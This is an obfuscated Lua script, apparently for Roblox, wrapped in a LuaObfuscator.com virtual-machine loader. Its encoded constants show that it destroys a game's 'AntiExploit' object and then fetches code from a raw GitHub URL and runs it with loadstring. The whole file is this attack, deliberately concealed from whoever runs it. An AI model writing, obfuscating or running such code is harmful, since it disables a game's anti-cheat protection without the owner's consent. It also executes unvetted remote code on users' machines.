--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v108=0;local v109;while true do if (v108==0) then v109=v5(v81,v19);v19=nil;v108=1;end if (v108==1) then return v109;end end else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=0;local v83;while true do if (v82==(0 -0)) then v83=(v31/((5 -3)^(v32-1)))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -((1432 -(282 + 595)) + 64)))) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=2^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + ((1247 + 25) -(51 + 175 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(32 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * 256) + v38 ;end local function v24() local v42=0 -(438 -(145 + 293)) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (2==v42) then v47=v20(v44,21,381 -(87 + (705 -(416 + 26))) );v48=((v20(v44,212 -(67 + 113) )==(1 + 0)) and  -((432 -(44 + 386)) -(3 -2))) or (1 + 0) ;v42=11 -8 ;end if (v42==(953 -(802 + (1636 -(998 + 488))))) then v45=2 -1 ;v46=(v20(v44,1 -0 ,15 + 3 + 2 ) * ((999 -(291 + 624 + 82))^(90 -58))) + v43 ;v42=2 + 0 ;end if (v42==(3 -0)) then if (v47==(1187 -(876 + 193 + (208 -90)))) then if (v46==0) then return v48 * 0 ;else v47=1;v45=0 -0 ;end elseif (v47==(4477 -2430)) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((793 -(368 + 423))^(163 -111)))) ;end if (v42==(18 -(10 + 8))) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49) local v50=772 -(201 + 571) ;local v51;local v52;while true do if ((1139 -(116 + 1022))==v50) then v51=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;v50=2 + 0 ;end if (v50==((1423 -(630 + 793)) -0)) then v51=nil;if  not v49 then local v102=0 -0 ;while true do if (v102==(859 -(814 + 45))) then v49=v23();if (v49==((0 -0) -0)) then return "";end break;end end end v50=1 + (0 -0) ;end if ((2 + 1)==v50) then return v6(v52);end if (v50==(887 -(261 + 624))) then v52={};for v92=1 -0 , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=(427 + 656) -(1020 + 60) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53~= #"{") then else local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88==0) then v89=(function() return 0 -0 ;end)();while true do if (v89~=(867 -(550 + 317))) then else v58=(function() return v23();end)();v59=(function() return {};end)();v89=(function() return 1;end)();end if (v89~=(2 -0)) then else v53=(function() return 2 -0 ;end)();break;end if (1~=v89) then else for v112= #"]",v58 do local v113=(function() return 0;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v113~=(2 -1)) then else if (v114== #",") then v115=(function() return v21()~=(285 -(134 + 151)) ;end)();elseif (v114==2) then v115=(function() return v24();end)();elseif (v114== #"xnx") then v115=(function() return v25();end)();end v59[v112]=(function() return v115;end)();break;end if (v113~=(1665 -(970 + 695))) then else local v165=(function() return 0;end)();while true do if (v165==(0 -0)) then v114=(function() return v21();end)();v115=(function() return nil;end)();v165=(function() return 1;end)();end if (v165~=1) then else v113=(function() return 1;end)();break;end end end end end v57[ #"nil"]=(function() return v21();end)();v89=(function() return 1992 -(582 + 1408) ;end)();end end break;end end end if (v53~=(6 -4)) then else for v94= #"}",v23() do local v95=(function() return v21();end)();if (v20(v95, #",", #"!")==0) then local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v103==2) then while true do if (v104==(2 -0)) then local v138=(function() return 0 -0 ;end)();local v139=(function() return;end)();while true do if (v138~=(1824 -(1195 + 629))) then else v139=(function() return 0 -0 ;end)();while true do if (v139~=(241 -(187 + 54))) then else if (v20(v106, #"|", #"|")~= #":") then else v107[2]=(function() return v59[v107[782 -(162 + 618) ]];end)();end if (v20(v106,2 + 0 ,2)== #" ") then v107[ #"-19"]=(function() return v59[v107[ #"xxx"]];end)();end v139=(function() return 1;end)();end if (v139==1) then v104=(function() return  #"91(";end)();break;end end break;end end end if (v104==(0 + 0)) then local v140=(function() return 0 -0 ;end)();local v141=(function() return;end)();while true do if (v140==0) then v141=(function() return 0;end)();while true do if (v141~=(0 -0)) then else v105=(function() return v20(v95,2, #"-19");end)();v106=(function() return v20(v95, #"asd1",1 + 5 );end)();v141=(function() return 1;end)();end if (v141==(1637 -(1373 + 263))) then v104=(function() return  #"<";end)();break;end end break;end end end if (v104== #"xxx") then if (v20(v106, #"91(", #"-19")~= #"/") then else v107[ #"asd1"]=(function() return v59[v107[ #"xnxx"]];end)();end v54[v94]=(function() return v107;end)();break;end if (v104== #"|") then local v143=(function() return 1000 -(451 + 549) ;end)();local v144=(function() return;end)();while true do if (v143~=(0 + 0)) then else v144=(function() return 0;end)();while true do if (v144~=0) then else v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==0) then local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 1384 -(746 + 638) ;end)();while true do if (0==v183) then v107[ #"xnx"]=(function() return v22();end)();v107[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"]") then v107[ #"91("]=(function() return v23();end)();elseif (v105==(1 + 1)) then v107[ #"19("]=(function() return v23() -(2^(23 -7)) ;end)();elseif (v105~= #"19(") then else local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if ((341 -(218 + 123))~=v188) then else v189=(function() return 1581 -(1535 + 46) ;end)();while true do if (v189~=0) then else v107[ #"xxx"]=(function() return v23() -(2^16) ;end)();v107[ #"http"]=(function() return v22();end)();break;end end break;end end end v144=(function() return 1;end)();end if (v144~=(1 + 0)) then else v104=(function() return 2;end)();break;end end break;end end end end break;end if (v103~=(0 + 0)) then else local v111=(function() return 0;end)();while true do if (1~=v111) then else v103=(function() return 561 -(306 + 254) ;end)();break;end if (v111~=(0 + 0)) then else v104=(function() return 0 -0 ;end)();v105=(function() return nil;end)();v111=(function() return 1;end)();end end end if (v103==1) then v106=(function() return nil;end)();v107=(function() return nil;end)();v103=(function() return 2;end)();end end end end for v96= #"}",v23() do v55[v96-#">" ]=(function() return v28();end)();end return v57;end if (v53~=(1467 -(899 + 568))) then else local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();while true do if (v90~=(0 -0)) then else v91=(function() return 603 -(268 + 335) ;end)();while true do if (v91~=(292 -(60 + 230))) then else v53=(function() return  #"[";end)();break;end if (v91==(572 -(426 + 146))) then v54=(function() return {};end)();v55=(function() return {};end)();v91=(function() return 1 + 0 ;end)();end if (v91~=1) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v91=(function() return 813 -(569 + 242) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[1 + 1 ];local v65=v60[(2925 -(260 + 1638)) -((1146 -(382 + 58)) + 318) ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1 + (0 -0) ;local v71= -(1252 -(600 + 121 + 530));local v72={};local v73={...};local v74=v12("#",...) -(2 -1) ;local v75={};local v76={};for v85=0 + 0 ,v74 do if ((3769>=1173) and (v85>=v68)) then v72[v85-v68 ]=v73[v85 + (701 -(271 + 429)) ];else v76[v85]=v73[v85 + 1 + 0 ];end end local v77=(v74-v68) + (1501 -(1408 + 92)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[1 + 0 ];if (v79<=((2264 -1168) -(461 + 625))) then if (v79<=(1292 -(993 + 295))) then if (v79<=(1 + 0)) then if (v79==(1171 -(418 + 753))) then local v116=v78[1 + 1 ];v76[v116](v76[v116 + 1 + 0 ]);else v76[v78[1 + 1 ]]=v76[v78[1 + 2 ]][v78[2 + 2 ]];end elseif (v79<=(531 -(406 + 123))) then v76[v78[1331 -(797 + 532) ]]=v62[v78[3 + (0 -0) ]];elseif (v79==(1772 -((2954 -(902 + 303)) + 20))) then local v145=0 -0 ;local v146;local v147;local v148;local v149;while true do if (v145==(1203 -(373 + 829))) then v71=(v148 + v146) -(1 + 0) ;v149=1322 -(1249 + 73) ;v145=(1 -0) + 1 ;end if ((1485==1485) and (v145==(1147 -(466 + 679)))) then for v177=v146,v71 do v149=v149 + (1 -0) ;v76[v177]=v147[v149];end break;end if (v145==(0 -0)) then v146=v78[(11 -6) -3 ];v147,v148=v69(v76[v146](v13(v76,v146 + 1 + 0 ,v78[3 -0 ])));v145=1901 -(106 + 1794) ;end end else local v150=0 + 0 ;local v151;local v152;while true do if ((0 + 0)==v150) then v151=v78[(1 + 4) -3 ];v152=v76[v78[3 + 0 ]];v150=2 -1 ;end if ((1 + 0)==v150) then v76[v151 + (115 -(4 + (1800 -(1121 + 569)))) ]=v152;v76[v151]=v152[v78[588 -(57 + 527) ]];break;end end end elseif ((v79<=(1434 -(41 + 1386))) or (3315<=2782)) then if (v79<=(1585 -(1183 + 397))) then local v121=v78[105 -(17 + (300 -(22 + 192))) ];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 + (683 -(483 + 200)) ,v78[6 -3 ])));v71=(v123 + v121) -(1 + 0) ;local v124=0 -0 ;for v136=v121,v71 do local v137=166 -(122 + 44) ;while true do if ((0 -0)==v137) then v124=v124 + (1 -0) ;v76[v136]=v122[v124];break;end end end elseif (v79>(19 -13)) then if ((v76[v78[2]]==v78[4 + 0 ]) or (876>=2964)) then v70=v70 + 1 + 0 ;else v70=v78[3 -(1463 -(1404 + 59)) ];end else do return;end end elseif ((v79<=(8 + 0)) or (2232>2497)) then v76[v78[3 -1 ]]=v78[(186 -118) -(30 + 35) ];elseif (v79>(7 + 2)) then local v153=v78[1259 -(1043 + 214) ];v76[v153]=v76[v153](v13(v76,v153 + (3 -2) ,v71));else v76[v78[1214 -(323 + 889) ]]=v62[v78[7 -4 ]];end elseif (v79<=((1365 -349) -(938 + 63))) then if (v79<=(592 -(361 + 219))) then if ((v79>(331 -(53 + (1032 -(468 + 297))))) or (2110<=332)) then local v127=v78[1 + 1 ];local v128=v76[v78[1616 -(1565 + (610 -(334 + 228))) ]];v76[v127 + (414 -(15 + 398)) ]=v128;v76[v127]=v128[v78[(3851 -2709) -(782 + 356) ]];else do return;end end elseif (v79<=(995 -(18 + 964))) then v76[v78[7 -5 ]]=v78[2 + 1 ];elseif ((3686>3172) and (v79==(20 -(13 -7)))) then v76[v78[2 + 0 ]]();else v76[v78[(3403 -1526) -(45 + 112 + 1718) ]]=v76[v78[3 + (236 -(141 + 95)) ]][v78[854 -(20 + 830) ]];end elseif ((v79<=(15 + 3)) or (4474<820)) then if (v79<=(1034 -(697 + 321))) then if (v76[v78[128 -(116 + 10) ]]==v78[1 + 3 ]) then v70=v70 + (739 -(542 + 193 + 3)) ;else v70=v78[3];end elseif ((4279>=2882) and (v79>(35 -18))) then local v160=v78[1 + 1 ];v76[v160]=v76[v160](v13(v76,v160 + (2 -1) + 0 ,v71));else v70=v78[3];end elseif ((v79<=(7 + 12)) or (2029>=3521)) then local v134=0 -0 ;local v135;while true do if (((0 -0) -0)==v134) then v135=v78[1553 -(1126 + 425) ];v76[v135](v76[v135 + (406 -(118 + 287)) ]);break;end end elseif (v79>(78 -58)) then v76[v78[2]]();else v70=v78[1124 -(118 + 1003) ];end v70=v70 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!093Q00028Q0003093Q00776F726B7370616365030D3Q00436F6E66696775726174696F6E030B3Q00416E74694578706C6F697403073Q0044657374726F79030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403543Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F46722Q65506169645443532F436F7061526F626C6F782F726566732F68656164732F6D61696E2F436F7061526F626C6F2Q7800123Q0012083Q00013Q0026073Q0001000100010004113Q00010001001202000100023Q0020010001000100030020010001000100040020040001000100052Q0013000100020001001202000100063Q001202000200073Q002004000200020008001208000400094Q0005000200044Q001200013Q00022Q000E0001000100010004113Q001100010004113Q000100012Q00063Q00017Q00",v9(),...);
